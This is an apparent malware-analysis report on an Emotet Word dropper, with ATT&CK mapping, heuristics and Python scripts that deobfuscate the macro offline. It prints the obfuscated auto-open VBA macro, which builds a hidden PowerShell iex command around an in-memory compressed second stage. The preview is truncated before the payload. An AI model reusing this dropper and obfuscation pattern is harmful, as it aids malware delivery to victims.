Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 6f9ae03683fb127c…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 236.8 KB
Created: 2018-07-10 22:03:00
Authoring application: Microsoft Office Word
First seen: 2018-07-23
MD5: 227a5dab67bb8cec8376e60f0779a7ed
SHA-1: 37ab8344dacac3a80feddbb1e4b32a15d69ca879
SHA-256: 6f9ae03683fb127c148cf6f031fbe01a610e2b16c7ea8a7107c06490ffc2a698
Risk score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution
Note on the mapping: the document relies on the user enabling macros rather than on a software vulnerability, so T1204.002 (User Execution: Malicious File) is the closer fit than T1203. The recovered command also implicates T1059.001 (PowerShell) and T1027 (Obfuscated Files or Information), which the report does not tag.

The document carries VBA macros. Document_open in the ThisDocument module (VB_Name "RtmZmibrQGOZLQ") fires when the file is opened with macros enabled, sets On Error Resume Next so that any runtime error is silently skipped, and passes a concatenated string to a procedure named zqmsbZVvCus; the Shell() call reported by OLE_VBA_SHELL is not within the truncated preview. Function bhwpjajCd builds that string from short quoted fragments padded with identifiers that are never assigned anywhere in the module (an unassigned Variant is Empty, and VBA's + operator returns the other operand unchanged when one side is Empty), plus Chr(43) for the "+" characters. Keeping only the literals from the statements shown in the preview gives:

powershell  & ( $sHellid[1]+$SHeLLId[13]+'x') (New-objECT  SYsTEm.iO.STreaMrEADEr((New-objECT  iO.COMPRessIon.deFLaTesTREAM( [

$ShellId evaluates to "Microsoft.PowerShell" in the standard console host, so $ShellId[1]+$ShellId[13]+'x' spells iex without Invoke-Expression or its alias ever appearing in the macro. The argument handed to iex is built from a StreamReader wrapped around a DeflateStream: the second stage is a compressed PowerShell script that is inflated in memory at run time rather than fetched by a visible DownloadString call. The preview stops before the compressed data, so the contents, download locations and behaviour of that second stage cannot be read from this report; the one URL extracted from the document body is the DrawingML schema namespace, not a payload location. The visible chain (auto-open macro, Shell() into PowerShell, obfuscated in-memory second stage) is the dropper pattern characteristic of Emotet maldocs, and the ClamAV signature Doc.Dropper.Emotet-6958952-0 independently supports the classification.
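The command assembled by the macro (see the extracted macros.bas preview below) ends in a StreamReader wrapped around a System.IO.Compression.DeflateStream, which inflates the second stage in memory at run time. The Python below is an added example, not part of the original report or of the tooling it names: it reproduces that step offline so the inflated script can be read instead of executed. Because the preview is cut off before the compressed data, SAMPLE_STAGE2 and the blobs built from it are constructed stand-ins. The facts relied on are that .NET's DeflateStream reads headerless raw Deflate (zlib wbits = -15) and that StreamReader defaults to UTF-8 with BOM detection; the zlib and gzip variants are included because analysts regularly meet blobs that were re-wrapped somewhere along the way.

```python
import base64
import zlib

# Constructed stand-in for the inflated second stage. The real compressed data
# is cut off in the macro preview, so nothing here reflects Emotet's actual
# second-stage script.
SAMPLE_STAGE2 = "Write-Output 'constructed second-stage stand-in'"

# zlib window parameters for the three containers met in practice. Negative
# wbits selects raw Deflate, which is what System.IO.Compression.DeflateStream
# reads and writes; adding 32 lets zlib.decompress accept a zlib or gzip header.
RAW_DEFLATE, ZLIB, GZIP = -15, 15, 31
CONTAINER_WBITS = {"raw-deflate": RAW_DEFLATE, "zlib": ZLIB, "gzip": GZIP}


def make_sample_blob(script: str, container: str = "raw-deflate") -> str:
    """Produce the base64 text a dropper would hand to FromBase64String.
    'raw-deflate' is the DeflateStream-compatible form; the other two exist so
    the wrong-container case below can be exercised. Constructed test data."""
    comp = zlib.compressobj(level=9, wbits=CONTAINER_WBITS[container])
    data = comp.compress(script.encode("utf-8")) + comp.flush()
    return base64.b64encode(data).decode("ascii")


def detect_container(raw: bytes) -> str:
    """Classify compressed bytes by header. gzip starts with 1F 8B; a zlib
    stream starts with a CMF/FLG pair (CM = 8, 16-bit value divisible by 31).
    Raw Deflate carries no header, so it is the fall-through case."""
    if raw[:2] == b"\x1f\x8b":
        return "gzip"
    if len(raw) >= 2 and (raw[0] & 0x0F) == 8 and ((raw[0] << 8) | raw[1]) % 31 == 0:
        return "zlib"
    return "raw-deflate"


def inflate_stage2(b64_blob: str):
    """Do offline what StreamReader(DeflateStream(...)) does at run time:
    base64-decode, inflate, and decode as UTF-8 (StreamReader's default,
    dropping a BOM if one is present). Returns (container, script) so the
    analyst sees when a blob deviates from the headerless form DeflateStream
    expects, which is exactly the case where the macro itself would fail."""
    raw = base64.b64decode(b64_blob)
    container = detect_container(raw)
    if container == "raw-deflate":
        inflated = zlib.decompress(raw, RAW_DEFLATE)
    else:
        inflated = zlib.decompress(raw, ZLIB | 32)  # zlib/gzip auto-detect
    return container, inflated.decode("utf-8-sig")


if __name__ == "__main__":
    blob = make_sample_blob(SAMPLE_STAGE2)
    print(inflate_stage2(blob))
```

Feed `inflate_stage2` the base64 argument recovered from a real sample; a result other than "raw-deflate" means the blob was re-encoded after extraction (or the author used a different stream class), which is worth noting before drawing conclusions from the inflated text.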

Heuristics (6)

  • CLAMAV_DETECTION (critical): ClamAV: Doc.Dropper.Emotet-6958952-0
    ClamAV detected this file as malware: Doc.Dropper.Emotet-6958952-0
  • OLE_VBA_MACROS (medium, 3 related findings): VBA macros detected
    Document contains VBA macro code.
  • OLE_VBA_SHELL (critical): Shell() call in VBA
    The macro source calls Shell(), which launches an external process from the document; here the process is PowerShell.
  • OLE_VBA_DOCOPEN (high): Document_Open macro
    An auto-execution procedure runs as soon as the document is opened with macros enabled, with no further user action.
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where no readable source is available.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label states which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier carried by any Office document that embeds a drawing; it is not a network indicator and should not be blocked or pivoted on.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  16893 bytes
SHA-256: e21c104df3a88482b85074dc48066003542df303c017c45f3ced9c709ad10358

Preview: first 1,000 lines of the extracted script (the listing below is truncated)
Attribute VB_Name = "RtmZmibrQGOZLQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   XDmIVl = 3375 - jnoUtO / 79145 * KumNXR
   fDDzcd = 58742 - vHOEv / 58522 * iNGwUL
   DolDTq = 74413 - MtFrnM / 82007 * uGVaB
   QYMmaZ = 10999 - FrSFT / 55071 * AGqUIS
zqmsbZVvCus ("" + CILZdzU + jtqVIithfQH + bhwpjajCd + EiwOipGSU + COGnwA + GDjYamBiidIzp + PSwFLOkCoPSZ)
   HtjYvw = 30063 - NVasa / 17857 * DtiYU
End Sub


Attribute VB_Name = "FREbVBsJ"
Function bhwpjajCd()
On Error Resume Next
hLfWm = iuznqp - wCVUOB + CNFji - cJszdz / 58230 * PmAAZ / 89970 * IoOVoV * NvntQ * RTGzn * VVCzKs - qjPVU
   vzmILC = EKwcs - DFkLHp + UpzFj - pKVwnZ / 74572 * azPmhn / 64018 * kswzw * Pufrda * Gwhci * zjLJD - rdHUZ
   hSEGG = jHvbSv - LRTziK + ajTYju - EEHZGR / 52561 * BBrasB / 10724 * HsNIu * JHlPb * zwfWMr * DoCMiT - QRHIR
jTEuSE = "pow" + uZrLuTGwwMk + pwjAMbZb + "e" + DcdipzZSEJvXu + tfOZFmZLEAkjU + "r" + jAnkniQoR + ufXLSCRMTw + "sh" + ACdRYdF + KqdukJb + "ell" + qzaisuntiiS + RVwmiJRsLMkRj + " " + QhspHrFNbSJjdi + vzXYHwzaSo + " &" + lqRIFsdBpcA + IWUYZnNR + " (" + UMPmTkRWSHbbl + ikBthSw + " $" + zacCsAWNw + wpGKQXGipkjlTX + "sH" + MXHVYlC + HPiSkOfjEFoiq + "el"
MNldT = IfzzJp - jYKmTQ + IbPEV - BPSGY / 41979 * wIKAZT / 8504 * kjUbYp * juCLa * ClwhH * ntNqZ - tsXNJN
   KXvvc = LwjXEM - cuXMTS + RFXqu - iwfSlo / 22095 * IipCE / 19032 * oKplN * RwzBpu * vFAEBp * PSQlP - hUPhJ
CpAEV = "lid" + cvhEhvNzfRvuNS + lBPrqWtDWLK + "[1]" + SralCSKTATtE + wqVoPRlwIARE + Chr(43) + "$S" + diVlQPN + IKzsKkhVmZ + "HeL" + NAXufzViaUwMJp + IoCZXVNdPZbLbf + "L" + WFQhzqkRrsu + njUSiNwX + "I" + rnufGVKHvq + DZkBRDkhfaZRc + "d" + ssRfIMi + DLdvhkzwtzfvih + "[1" + mcsQNdCQPRPdLK + ApwGZoAuad + "3]" + Chr(43) + KKKKWkVjpHh + NjPVWljT + "'x" + sjpVwczpjFXGEG + aotfsIYz + "') " + kYEroLAP + hPXHsRzUkGb + "(N" + QLuaiCjLr + rYlsRMFpodZKR + "e" + aLDNFjbHojtlW + PpHjQUjFDYBm + "w" + qAcnrcYHiCKPQ + XajcGOjD + "-"
mQkWEL = PzGQsi - iwAGhE + JmPRZ - XOzqhX / 94238 * IvkSG / 8198 * QXzTC * nXAkZ * YciUFf * PACQiV - saAPoa
   TuGAo = tIUzj - zikKH + EWADi - fzRKNY / 14514 * sRYhRH / 80145 * QHvAfG * ErwGYz * VPMMU * mjuvpi - fGDsA
   GtHhO = TNSRS - ziwIVE + wLhNAK - hwzoDG / 4618 * HcHiwv / 45603 * QddGl * iwhnNX * YfHXRr * PiNMh - WUArG
sTGofU = "ob" + ORzWcjqzFIkYid + mboGOHOwULN + "jEC" + vwmdjQDIIBfJ + akJOwZkC + "T" + pfGCwCRW + KJwvuNYW + "  " + JwJzoOKwQzA + bnDJAKGkJpsAQm + "SY" + jBOYYBsWJO + UFVMQKWHqDXMX + "sT" + GRwXbwc + lUaZvhAmaOPDUf + "Em." + PGcfdBBi + FMqIusXZawjz + "iO." + DlmIawml + MqzCSjSsY + "STr" + nvRTWfuEnXS + bsPtHEzTAa + "e" + sVGqdrZ + QpUpEQrjZtuw + "a" + aUZkTJImVWO + oOKjsrmK + "Mr" + EDoHnajAIMufWD + tYdUwaZ + "E" + SPNBFtQ + VjfBVLoVGR + "ADE" + rGZnzOji + dhFULTzDTiH + "r" + ZarCRfcUHrtb + OHijqbrDzwAAV + "(" + wkBtXzM + OCUJVqLt + "(N" + kwovRVqWcuC + GRJGrhln + "e"
JzsNs = 24110 * UMRsjv - (43240 + dOIpVJ)
   VULzQ = 12822 * EKRpI - (45350 + tpUXRu)
   SUnHh = 64022 * lHzpl - (12099 + pkYhd)
ickTqZ = "w" + LnPHJYn + OcWshMT + "-" + NhRFNCh + UzsAnYSzM + "ob" + wjWCouuZAIIEDq + kGZMZpETR + "j" + pzahzROEj + QTIIULMto + "E" + KhtnpZJbDk + FbaaImpmmDV + "CT" + ERVtGYU + ntnMcovFIf + "  " + ChukEHzXiGMEh + ohwMKbln + "i" + vJArjvqDSBjbJ + Uhlhjjirj + "O." + MSaLRtNwIz + CLWAPjYNXtv + "CO" + zGAEQRUkIjXcGj + NtTVBjVKi + "M" + HtASXkRR + srfivtcw + "PRe"
zizKz = UtPkpV * JMrIQ / roRCAU * orGqt / 23279 / GIZtp
   QYBCXW = VRDlLz * Thfwqz / dnZqdM * BnzTzC / 53483 / PzdwL
vqIacji = "ssI" + FiMdmat + VJnlcMuKwUiFRN + "on." + DSfVrmU + UIQiHbtCUcto + "d" + ninPwuwnUQZjI + HiojAHDicos + "eF" + zkCPYir + XWJohnz + "LaT" + TicNuEFijj + aFItpkNJ + "es" + WnDLSaMaQiS + HbkqwKtwHh + "T" + QAvrDmzNpIoJil + FTatLjBRE + "R" + zRfOGKPCZ + MsTCjwmaHMfb + "E" + GzlkzdmJXAvJt + TjFAXGiZIwCfil + "A" + pnazLiRanv + SHZEEbocaa + "M" + YZcnwwIXUhFW + npSiNbDNHBWz + "( [" + zatPSt
... (truncated)
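The string obfuscation in bhwpjajCd above can be undone mechanically. The following Python script is an added example, not part of the original report or of oletools: it takes the five string-building statements exactly as they appear in the preview, keeps only the quoted literals and Chr() calls (every other identifier on those lines is never assigned, so it is an Empty Variant and VBA's + operator drops it), and then resolves the $ShellId indexing. The value of $ShellId ("Microsoft.PowerShell" in the console host) is a PowerShell fact, not something on this page.

```python
import re

# The five string-building statements of Function bhwpjajCd, copied verbatim
# from the macros.bas preview. The arithmetic filler lines between them build
# nothing and are omitted. Every bare identifier here (uZrLuTGwwMk, pwjAMbZb,
# ...) is never assigned anywhere in the module, so it is an Empty Variant, and
# VBA's "+" returns the other operand unchanged when one side is Empty: only the
# quoted literals and the Chr() calls survive evaluation.
MACRO_STATEMENTS = r"""
jTEuSE = "pow" + uZrLuTGwwMk + pwjAMbZb + "e" + DcdipzZSEJvXu + tfOZFmZLEAkjU + "r" + jAnkniQoR + ufXLSCRMTw + "sh" + ACdRYdF + KqdukJb + "ell" + qzaisuntiiS + RVwmiJRsLMkRj + " " + QhspHrFNbSJjdi + vzXYHwzaSo + " &" + lqRIFsdBpcA + IWUYZnNR + " (" + UMPmTkRWSHbbl + ikBthSw + " $" + zacCsAWNw + wpGKQXGipkjlTX + "sH" + MXHVYlC + HPiSkOfjEFoiq + "el"
CpAEV = "lid" + cvhEhvNzfRvuNS + lBPrqWtDWLK + "[1]" + SralCSKTATtE + wqVoPRlwIARE + Chr(43) + "$S" + diVlQPN + IKzsKkhVmZ + "HeL" + NAXufzViaUwMJp + IoCZXVNdPZbLbf + "L" + WFQhzqkRrsu + njUSiNwX + "I" + rnufGVKHvq + DZkBRDkhfaZRc + "d" + ssRfIMi + DLdvhkzwtzfvih + "[1" + mcsQNdCQPRPdLK + ApwGZoAuad + "3]" + Chr(43) + KKKKWkVjpHh + NjPVWljT + "'x" + sjpVwczpjFXGEG + aotfsIYz + "') " + kYEroLAP + hPXHsRzUkGb + "(N" + QLuaiCjLr + rYlsRMFpodZKR + "e" + aLDNFjbHojtlW + PpHjQUjFDYBm + "w" + qAcnrcYHiCKPQ + XajcGOjD + "-"
sTGofU = "ob" + ORzWcjqzFIkYid + mboGOHOwULN + "jEC" + vwmdjQDIIBfJ + akJOwZkC + "T" + pfGCwCRW + KJwvuNYW + "  " + JwJzoOKwQzA + bnDJAKGkJpsAQm + "SY" + jBOYYBsWJO + UFVMQKWHqDXMX + "sT" + GRwXbwc + lUaZvhAmaOPDUf + "Em." + PGcfdBBi + FMqIusXZawjz + "iO." + DlmIawml + MqzCSjSsY + "STr" + nvRTWfuEnXS + bsPtHEzTAa + "e" + sVGqdrZ + QpUpEQrjZtuw + "a" + aUZkTJImVWO + oOKjsrmK + "Mr" + EDoHnajAIMufWD + tYdUwaZ + "E" + SPNBFtQ + VjfBVLoVGR + "ADE" + rGZnzOji + dhFULTzDTiH + "r" + ZarCRfcUHrtb + OHijqbrDzwAAV + "(" + wkBtXzM + OCUJVqLt + "(N" + kwovRVqWcuC + GRJGrhln + "e"
ickTqZ = "w" + LnPHJYn + OcWshMT + "-" + NhRFNCh + UzsAnYSzM + "ob" + wjWCouuZAIIEDq + kGZMZpETR + "j" + pzahzROEj + QTIIULMto + "E" + KhtnpZJbDk + FbaaImpmmDV + "CT" + ERVtGYU + ntnMcovFIf + "  " + ChukEHzXiGMEh + ohwMKbln + "i" + vJArjvqDSBjbJ + Uhlhjjirj + "O." + MSaLRtNwIz + CLWAPjYNXtv + "CO" + zGAEQRUkIjXcGj + NtTVBjVKi + "M" + HtASXkRR + srfivtcw + "PRe"
vqIacji = "ssI" + FiMdmat + VJnlcMuKwUiFRN + "on." + DSfVrmU + UIQiHbtCUcto + "d" + ninPwuwnUQZjI + HiojAHDicos + "eF" + zkCPYir + XWJohnz + "LaT" + TicNuEFijj + aFItpkNJ + "es" + WnDLSaMaQiS + HbkqwKtwHh + "T" + QAvrDmzNpIoJil + FTatLjBRE + "R" + zRfOGKPCZ + MsTCjwmaHMfb + "E" + GzlkzdmJXAvJt + TjFAXGiZIwCfil + "A" + pnazLiRanv + SHZEEbocaa + "M" + YZcnwwIXUhFW + npSiNbDNHBWz + "( [" + zatPSt
""".strip().splitlines()

# One token per VBA string literal ("..." with "" as the escaped quote) or
# Chr(n) call, matched in source order.
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|Chr\((\d+)\)')


def recover_literal(statement: str) -> str:
    """Return the string a VBA concatenation statement evaluates to when every
    bare identifier on its right-hand side is Empty."""
    _, _, rhs = statement.partition("=")
    parts = []
    for m in TOKEN_RE.finditer(rhs):
        if m.group(2) is not None:                    # Chr(43) -> "+"
            parts.append(chr(int(m.group(2))))
        else:                                         # "lit", with "" unescaped
            parts.append(m.group(1).replace('""', '"'))
    return "".join(parts)


def recover_command(statements) -> str:
    """Concatenate the recovered literals in the order the function builds them."""
    return "".join(recover_literal(s) for s in statements)


# $ShellId is a PowerShell automatic variable; in the standard console host it
# reads "Microsoft.PowerShell", so [1] is "i" and [13] is "e". Indexing into it
# spells "iex" without the alias ever appearing in the macro text.
SHELL_ID = "Microsoft.PowerShell"
TERM_RE = re.compile(r"\$shellid\[(\d+)\]|'([^']*)'", re.I)
EXPR_RE = re.compile(
    r"\(\s*((?:(?:\$shellid\[\d+\]|'[^']*')\s*\+\s*)+(?:\$shellid\[\d+\]|'[^']*'))\s*\)",
    re.I,
)


def resolve_shellid_alias(command: str) -> str:
    """Replace ( $ShellId[i]+$ShellId[j]+'x' )-style expressions with the
    literal they evaluate to, case-insensitively."""
    def evaluate(match):
        out = []
        for t in TERM_RE.finditer(match.group(1)):
            out.append(SHELL_ID[int(t.group(1))] if t.group(1) is not None else t.group(2))
        return "".join(out)
    return EXPR_RE.sub(evaluate, command)


if __name__ == "__main__":
    recovered = recover_command(MACRO_STATEMENTS)
    print(recovered)
    print(resolve_shellid_alias(recovered))
```

The recovered text stops at the opening of the DeflateStream argument because the preview does, so the compressed second stage is not reachable from this report; on a complete extraction the same two functions run over the remaining statements of bhwpjajCd yield the full command line, base64 blob included.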